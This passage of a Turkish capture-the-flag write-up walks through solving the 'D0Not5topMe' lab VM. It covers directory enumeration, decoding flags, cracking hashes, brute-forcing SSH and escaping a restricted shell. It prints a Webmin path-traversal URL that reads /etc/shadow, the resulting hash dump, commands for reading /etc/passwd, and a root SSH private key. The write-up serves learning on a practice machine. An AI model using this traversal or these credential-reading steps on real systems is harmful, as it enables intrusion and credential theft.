                                                                               
---- Entering directory: http://D0Not5topMe.ctf/manual/fr/misc/ ----
+ http://D0Not5topMe.ctf/manual/fr/misc/index.html (CODE:200|SIZE:5407)        
                                                                               
---- Entering directory: http://D0Not5topMe.ctf/manual/fr/mod/ ----
+ http://D0Not5topMe.ctf/manual/fr/mod/index.html (CODE:200|SIZE:24329)        
                                                                               
---- Entering directory: http://D0Not5topMe.ctf/manual/fr/programs/ ----
+ http://D0Not5topMe.ctf/manual/fr/programs/index.html (CODE:200|SIZE:7185)    
                                                                               
---- Entering directory: http://D0Not5topMe.ctf/manual/fr/ssl/ ----
+ http://D0Not5topMe.ctf/manual/fr/ssl/index.html (CODE:200|SIZE:5191)         
                                                                               
---- Entering directory: http://D0Not5topMe.ctf/manual/ja/developer/ ----
+ http://D0Not5topMe.ctf/manual/ja/developer/index.html (CODE:200|SIZE:5892)   
                                                                               
---- Entering directory: http://D0Not5topMe.ctf/manual/ja/faq/ ----
+ http://D0Not5topMe.ctf/manual/ja/faq/index.html (CODE:200|SIZE:3602)         
                                                                               
---- Entering directory: http://D0Not5topMe.ctf/manual/ja/howto/ ----
+ http://D0Not5topMe.ctf/manual/ja/howto/index.html (CODE:200|SIZE:7723)       
                                                                               
---- Entering directory: http://D0Not5topMe.ctf/manual/ja/misc/ ----
+ http://D0Not5topMe.ctf/manual/ja/misc/index.html (CODE:200|SIZE:5106)        
                                                                               
---- Entering directory: http://D0Not5topMe.ctf/manual/ja/mod/ ----
+ http://D0Not5topMe.ctf/manual/ja/mod/index.html (CODE:200|SIZE:23684)        
                                                                               
---- Entering directory: http://D0Not5topMe.ctf/manual/ja/programs/ ----
+ http://D0Not5topMe.ctf/manual/ja/programs/index.html (CODE:200|SIZE:6897)    
                                                                               
---- Entering directory: http://D0Not5topMe.ctf/manual/ja/ssl/ ----
+ http://D0Not5topMe.ctf/manual/ja/ssl/index.html (CODE:200|SIZE:5274)         
                                                                               
---- Entering directory: http://D0Not5topMe.ctf/manual/ko/developer/ ----
+ http://D0Not5topMe.ctf/manual/ko/developer/index.html (CODE:200|SIZE:5892)   
                                                                               
---- Entering directory: http://D0Not5topMe.ctf/manual/ko/faq/ ----
+ http://D0Not5topMe.ctf/manual/ko/faq/index.html (CODE:200|SIZE:3602)         
                                                                               
---- Entering directory: http://D0Not5topMe.ctf/manual/ko/howto/ ----
+ http://D0Not5topMe.ctf/manual/ko/howto/index.html (CODE:200|SIZE:6373)       
                                                                               
---- Entering directory: http://D0Not5topMe.ctf/manual/ko/misc/ ----
+ http://D0Not5topMe.ctf/manual/ko/misc/index.html (CODE:200|SIZE:5197)        
                                                                               
---- Entering directory: http://D0Not5topMe.ctf/manual/ko/mod/ ----
+ http://D0Not5topMe.ctf/manual/ko/mod/index.html (CODE:200|SIZE:21813)        
                                                                               
---- Entering directory: http://D0Not5topMe.ctf/manual/ko/programs/ ----
+ http://D0Not5topMe.ctf/manual/ko/programs/index.html (CODE:200|SIZE:5773)    
                                                                               
---- Entering directory: http://D0Not5topMe.ctf/manual/ko/ssl/ ----
+ http://D0Not5topMe.ctf/manual/ko/ssl/index.html (CODE:200|SIZE:5049)         
                                                                               
---- Entering directory: http://D0Not5topMe.ctf/manual/tr/developer/ ----
+ http://D0Not5topMe.ctf/manual/tr/developer/index.html (CODE:200|SIZE:5892)   
                                                                               
---- Entering directory: http://D0Not5topMe.ctf/manual/tr/faq/ ----
+ http://D0Not5topMe.ctf/manual/tr/faq/index.html (CODE:200|SIZE:3612)         
                                                                               
---- Entering directory: http://D0Not5topMe.ctf/manual/tr/howto/ ----
+ http://D0Not5topMe.ctf/manual/tr/howto/index.html (CODE:200|SIZE:6962)       
                                                                               
---- Entering directory: http://D0Not5topMe.ctf/manual/tr/misc/ ----
+ http://D0Not5topMe.ctf/manual/tr/misc/index.html (CODE:200|SIZE:5339)        
                                                                               
---- Entering directory: http://D0Not5topMe.ctf/manual/tr/mod/ ----
+ http://D0Not5topMe.ctf/manual/tr/mod/index.html (CODE:200|SIZE:22660)        
                                                                               
---- Entering directory: http://D0Not5topMe.ctf/manual/tr/programs/ ----
+ http://D0Not5topMe.ctf/manual/tr/programs/index.html (CODE:200|SIZE:7405)    
                                                                               
---- Entering directory: http://D0Not5topMe.ctf/manual/tr/ssl/ ----
+ http://D0Not5topMe.ctf/manual/tr/ssl/index.html (CODE:200|SIZE:5196)         
                                                                               
---- Entering directory: http://D0Not5topMe.ctf/manual/zh-cn/developer/ ----
+ http://D0Not5topMe.ctf/manual/zh-cn/developer/index.html (CODE:200|SIZE:5995)
                                                                               
---- Entering directory: http://D0Not5topMe.ctf/manual/zh-cn/faq/ ----
+ http://D0Not5topMe.ctf/manual/zh-cn/faq/index.html (CODE:200|SIZE:3571)      
                                                                               
---- Entering directory: http://D0Not5topMe.ctf/manual/zh-cn/howto/ ----
+ http://D0Not5topMe.ctf/manual/zh-cn/howto/index.html (CODE:200|SIZE:6566)    
                                                                               
---- Entering directory: http://D0Not5topMe.ctf/manual/zh-cn/misc/ ----
+ http://D0Not5topMe.ctf/manual/zh-cn/misc/index.html (CODE:200|SIZE:4807)     
                                                                               
---- Entering directory: http://D0Not5topMe.ctf/manual/zh-cn/mod/ ----
+ http://D0Not5topMe.ctf/manual/zh-cn/mod/index.html (CODE:200|SIZE:22261)     
                                                                               
---- Entering directory: http://D0Not5topMe.ctf/manual/zh-cn/programs/ ----
+ http://D0Not5topMe.ctf/manual/zh-cn/programs/index.html (CODE:200|SIZE:6833) 
                                                                               
---- Entering directory: http://D0Not5topMe.ctf/manual/zh-cn/ssl/ ----
+ http://D0Not5topMe.ctf/manual/zh-cn/ssl/index.html (CODE:200|SIZE:5042)      
                                                                               
-----------------
END_TIME: Fri May 12 13:27:48 2017
DOWNLOADED: 433528 - FOUND: 96

Arkaplanda devam ederken kayıt olmaya çalıştım ve başlık bilgilerinde dikkatimi çeken kısım oldu.

http://d0not5topme.ctf/FLaR6yF1nD3rZ_html adresine baktığımızda;

+++++ +++[- >++++ ++++< ]>+++ +++.+ +++++ .<+++ +[->- ---<] >---- ----.
++.<+ +++++ [->++ ++++< ]>+++ ++.<+ +++++ [->-- ----< ]>--- ----. +++++
+.<++ +++++ [->++ +++++ <]>++ +.<++ +++++ [->-- ----- <]>-- ----- -----
-.++. <++++ ++[-> +++++ +<]>+ +++++ +++++ +.<++ ++[-> ++++< ]>+++ +.<++
+++++ +[->- ----- --<]> ----- .<+++ +++++ [->++ +++++ +<]>+ .++++ ++.<+
+++++ ++[-> ----- ---<] >---. <++++ +++[- >++++ +++<] >++++ +++++ ++++.
<+++[ ->--- <]>-- ---.< +++++ ++[-> ----- --<]> .+.+. ----- -.+++ +++++
+.-.- ---.< +++++ ++[-> +++++ ++<]> ..-.- .++++ +.++. +++++ ++++. <++++
+++[- >---- ---<] >---- ----- --.-- ---.< +++++ ++[-> +++++ ++<]> +++++
.<+++ [->++ +<]>+ +.++. --.++ .<+++ ++++[ ->--- ----< ]>--- ----- ---.<

Benim de bildim olmadığı için metni gruba sordum, öğrendim ki Brainfuck 🙂 Gökay kardeşime teşekkür ederim. Ayrıca Çağatay’ın da reklamını yapalım.

https://github.com/cagataycali/awesome-brainfuck

Kodu çalıştırdğımızda flag karşımızda FL46_4:n02bv1rx5se4560984eedchjs72hsusu9 . Yalnız burda üçüncü bayrağı atladığımı farkediyorum. Sil baştan başladım ve smtp portunu gözden kaçırdığımı gördüm (Saatlerimi aldı).

nc -vv 172.189.64.225 25  komutu ile gelen dataya eriştim.

Hex olan datayı çözdüğümüzde aşağıdaki gibi sonuç çıktı.

46 4c 34 36 5f 33 3a 32 39 64 72 79 66 36 37 75 68 65 68 74 32 72 31 64 64 34 71 70 70 75 65 79 34 37 34 73 76 78 79 61 0a

FL46_3:29dryf67uheht2r1dd4qppuey474svxya

Sitede hata verdirtmeye çalışırken mail adresini gördüm ve yeni sitemizi bulmuş olduk.

Sitenin kaynağını incelerken game.js içinde yen bir adres buldum ve ordan devam ettim.

Gelen oyunda yine oyunu oynamak yerine kaynak koda baktım ve yeni adresi aldık.

Yeni siteyi /etc/hosts dosyasına ekledikten sonra terminalde kodları çalıştırmaya deniyorum. Parola t3rm1n4l.ctf onu bulduktan sonra

yeni adresi M36u574.ctf olarak buluyorum. Sitede resimler dışında veri bulamadım. Exif ve stenografi incelemesi yaparken “kingmegusta.jpg” resminin açıklamasında base64 veri gördüm.

TWVHdXN0YUtpbmc6JDYkZTEuMk5jVW8kOTZTZmtwVUhHMjVMRlpmQTVBYkpWWmp0RDRmczZmR2V0RGRlU0E5SFJwYmtEdzZ5NW5hdXdNd1JOUHhRbnlkc0x6UUd2WU9VODRCMm5ZL080MHBaMzAK

MeGustaKing:$6$e1.2NcUo$96SfkpUHG25LFZfA5AbJVZjtD4fs6fGetDdeSA9HRpbkDw6y5nauwMwRNPxQnydsLzQGvYOU84B2nY/O40pZ30

MeGustaKing:**********

Parolayı da hashcat ile çözdükten sonra ssh bağlantısı deniyorum. (Ki trollendik 🙂 )

U2FsdGVkX1/vv715OGrvv73vv73vv71Sa3cwTmw4Mk9uQnhjR1F5YW1adU5ISjFjVEZ2WW5sMk0zUm9kemcwT0hSbE5qZDBaV3BsZVNBS++/ve+/ve+/vWnvv704OCQmCg==

Salted__�y8j���Rkw0Nl82OnBxcGQyamZuNHJ1cTFvYnl2M3Rodzg0OHRlNjd0ZWpleSAK���i�88$&

FL46_6:pqpd2jfn4ruq1obyv3thw848te67tejey 

Aldığımız bilgilerle ssh bağlantısı için bruto force gerçekleştirdim.

Bundan sonrası en zorlandığım kısım oldu. Id, cat vs. komutlar çalışmadığı için ya  echo “$(</etc/passwd)” şeklinde kullanabildim ya da ssh özelliğinden sonuna cat /etc/passwd ekleyerek.

Burdan sonra takıldım ve Linux enumeration scriptlerini denemeye başladım.

Çalıştırılabilir script olarak /usr/bin/wmstrt vardı. Çalıştırdığımda 20’den geriye sayarak “D1dyaCatchaT3nK1l0? ” verdiğim ingilizce tepkiyi burda yazmak isterdim 🙂
Biraz düşününce 10000 portunun aktif olduğunu gördüm. 20 saniye sonra servis durduğu için ufak bir araştırmayla  for i in {1..1000..1};do echo $(/usr/bin/wmstrt);  bu şekilde döngüye soktum.

Çalışan servisi açtığımda https bağlantısına işaret etti.

Ssl ile bağlantı yaptığımda WebAdmin çalıştığını gördüm ve zafiyetini bulmak zor olmadı 🙂

https://172.189.64.225:10000/unauthenticated/..%01/..%01/..%01/..%01/etc/shadow
root:$6$6BxJZ5xd$x84bX7slaDzCWbtdQxNjVC92B7YrXlBsUCYVpsoI.MFqcT1tnoTMgXTK6O8Pkm1I7pS/7FvgagDWdkpliygQw1:17260:0:99999:7:::
daemon:*:17253:0:99999:7:::
bin:*:17253:0:99999:7:::
sys:*:17253:0:99999:7:::
sync:*:17253:0:99999:7:::
games:*:17253:0:99999:7:::
man:*:17253:0:99999:7:::
lp:*:17253:0:99999:7:::
mail:*:17253:0:99999:7:::
news:*:17253:0:99999:7:::
uucp:*:17253:0:99999:7:::
proxy:*:17253:0:99999:7:::
www-data:*:17253:0:99999:7:::
backup:*:17253:0:99999:7:::
list:*:17253:0:99999:7:::
irc:*:17253:0:99999:7:::
gnats:*:17253:0:99999:7:::
nobody:*:17253:0:99999:7:::
systemd-timesync:*:17253:0:99999:7:::
systemd-network:*:17253:0:99999:7:::
systemd-resolve:*:17253:0:99999:7:::
systemd-bus-proxy:*:17253:0:99999:7:::
Debian-exim:!:17253:0:99999:7:::
messagebus:*:17253:0:99999:7:::
statd:*:17253:0:99999:7:::
avahi-autoipd:*:17253:0:99999:7:::
sshd:*:17253:0:99999:7:::
burtieo:$6$BBlsb/oG$Aw.HS4JQQ7RgwB.5puvo7yJvXpa5URKfHxUcFYJM42b0pTIkH8Dao3QYrSLADS7Ov4fstuOHHYF8K/Khvpbc//:17257:0:99999:7:::
pdns:!:17253:0:99999:7:::
mysql:!:17253:0:99999:7:::
MeGustaKing:$6$.owswwq.$CMShrXnYmTvT2naqaqCDfUyEYJp0B8MoaW5q4YqU1uOBFlE6xtOby1S7EVvmdqWO5Oe/a5lBog7LovMJC4e/9/:17259:0:99999:7:::
dnsmasq:*:17257:0:99999:7:::

Bu kadar aşamadan sonra eriştiğim o root parolası kırılmasa makinayı çözmeyi bırakacaktım. Root parolasını bulmaya çalışırken aklıma başka bir makinadaki yol geldi.
Public ve private key’i elde edip ( /root/.ssh/id_rsa ) bağlanmak.

/root/.ssh/id_rsa...

-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,7DA162212961C0CF94C636B47C991024

rDnUjh68EoasdaP40ta9QBeXtvB5uUVH9nKHKWo4KvhLcM4Z0/R6qvjSjlHir4LR
uhTb5Y+e2C7Wze8GlYbdGksFXbUztZec26vN7xH8Q4SeI++J77agqKWRE6jJ++hd
DsR7vDcqGbm9xX37BbE9Q4lLEHR/hNRe3/Ztrbt3obnCLvCW6H3kzpteycWAQQ3W
BaFns85p4AZn654HoIqX/UOkztdYxgOLgpzrLh9p1bRLiaOiBCrURkpYLspeKCNN
yfuPvNUgF1+uH78GlvLwfAA6XRj6HPDZ3D22/MxKcGixUVSPXjJlRpqyFQtvSM6T
cN5NmXjOjmzfgafqPqf7eTFfLChcsWHUmsSneq7pQhvw/vfeGX2kizuXCago+yWt
2IlFusQilfDDzybiunNOp+njD7TxeBLFcAUVdACfMUQ/fC0GHKeHB8q79Wi7r0SQ
m0eC6fIXJpDavN9PtPF2v+5OH9EDKycaeWMmWT0S0fNMmIhHb+U/uhtDjQx+M9fI
I5aBCjzCsDCoKT0qkv+dTafyqSzUN9EupCRh0NcsUT00yrQkxzM5L6C3H+61SNq8
CNi4I50aDp8q6m0KP/GZhUAU9Uegj+JZQ1h5MSnjOpOvKbD4l6/rWM02iFVAmg4O
WjSQfqbxGCmoHE8Y7iqgB8lRWnDYPssDXIMx+1pBkNkBASMpz6gJBZ//rJE1PkVr
aKdhbJFR1NX097z3HXS/7SBJmyuctG+JviH7mp1fH3WMAk2iu4nSiE1aNH1YV/nW
rXNOi5c7/yDE9o/weuJoCBL4VXeH89+l8551JOGU9RMuNk0pi/SSaUwwn7wR0/Yf
b9Sk3pbFDS64AON1T+4zlBWWif8aRMJ7Vm6zkDsE1Jq9nKcNzDknfufs45mKVzXU
m9dlGgzfNF46yPCuHzBZt4q1wrzg5/7gcWx5Qq6xD5VtWiMlB4G3D8DruaeqgTOi
Sh/jFqEOErA015Ympz/0Hh/lFn0NAAJy89BPG86d+VVAn5YstQEqH6zzuIy9mZ9K
853+0BUxA0I9rEessa+Q+NlFadBVE2FcJAr7rMsLGZFoqfvWxg5hBJFJ7jrjpQNe
Q9qzA/CbiMeU+zdifXZwprJR1fNVWalPJJGwotwVgXN/z4s8iN1gMN9y4Kynue9k
zQ/HqvgTkyX52ojLnM/PkXCyx7EXBAOJi5s6fv/22kcZ5Xkpw+x/VILPnJqObmU9
RZ3IB6kbckiMld5GX+xMvYi9rvmHf/mdLj75e7PU+FjCufApXAi+T10PnvMvrCGS
FkSlVyPPo1s4klTdrf2l6tkK6Lqu/7SamkvQvMsY7wnNT4OPI95y3GoRnwEFLd7w
honOroF1U6leA5O8jxSxI/CIwxvb5DO/sX4bZxShlhD98yO74ImAg5ACTj/eUaVA
/Q7bpfasSnqdKNWhx81pD6Ee9WeBZv8c0I0/EqS188O1qFYbtsaqZhYytTqYwvZ0
p6QuusMnDaA1nB8wL7ltKXt5PhBBxSVbUKtP6DWcBRviItFTsAnmK1QhD2wmTkCu
B8ochgwCgtAUs4cUXxnZrp5pu2yvu8Dhf//z8lBtoItPh5LTmW1N1g4s+9NKt72P
-----END RSA PRIVATE KEY-----
/root/.ssh/id_rsa.pub

ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDPKVt8KEVrr80LT9ZwRsWG8w9O2vgWd99+2+xmi3WCgCR/IrhqoJqEhX9owwiaUUnyRWrj9AKDj8Neetju9rOCTJsvWAlfFgyrRXkOV9twpLcrML+LC5GsVGLH7U/R2sTpT9Ywad0yL+FTvHZ+AbYLFpml4Gbhat6Ynhcg3Q6XmxGHXkV9cd6/XCx74K8CKEtOye1REj8KDtsC329qvbp/9Dt1ZZQEAUFvLqgLJiZxmH5snWiszcO2TKQ3lUw3tLy5rA/bXe3Bf4zuEmktEuA0NW+FTLYELrBy/5PK007Uh0CQVpVS5C+tkLtqh6meAXPp7dhi/B6qGOIXpPxjpUjH [email protected]

Kırdığım parolayı da kullanarak bağlantıyı sağlıyorum. ssh -i id_rsa [email protected] .

Sonuç:

Root dizininden de son flag çıkmış oldu.

######################################################
#                                                    #
#  W311 D0n3                                         #
#  Y0u D1d N0t5top                                   #
#  Much0 M3Gu5t4 :D                                  #
#                                                    #
#  3mrgnc3                                           #
#                                                    #
#  Hope you had fun...                               #
#  8ut...                                            #
#                                                    #
#  p.s..                                             #
#  571ll 1 M0r3 f146 :D                              #
#                                                    #
######################################################
 
FL46_7:9tjt86evvcywuuf774hr88eui3nus8dlk
N3v3r As5um3! 1t M4k35 4n 455 0f y0u & m3 :DWS

Cidden zorlandığım ve bana katkısı olan bir makinaydı. Yapan arkadaş güzel yapmış. Kendisini tebrik etmek lazım ki ettim de 🙂

About Berk İMRAN

Cyber security researcher

Follow Me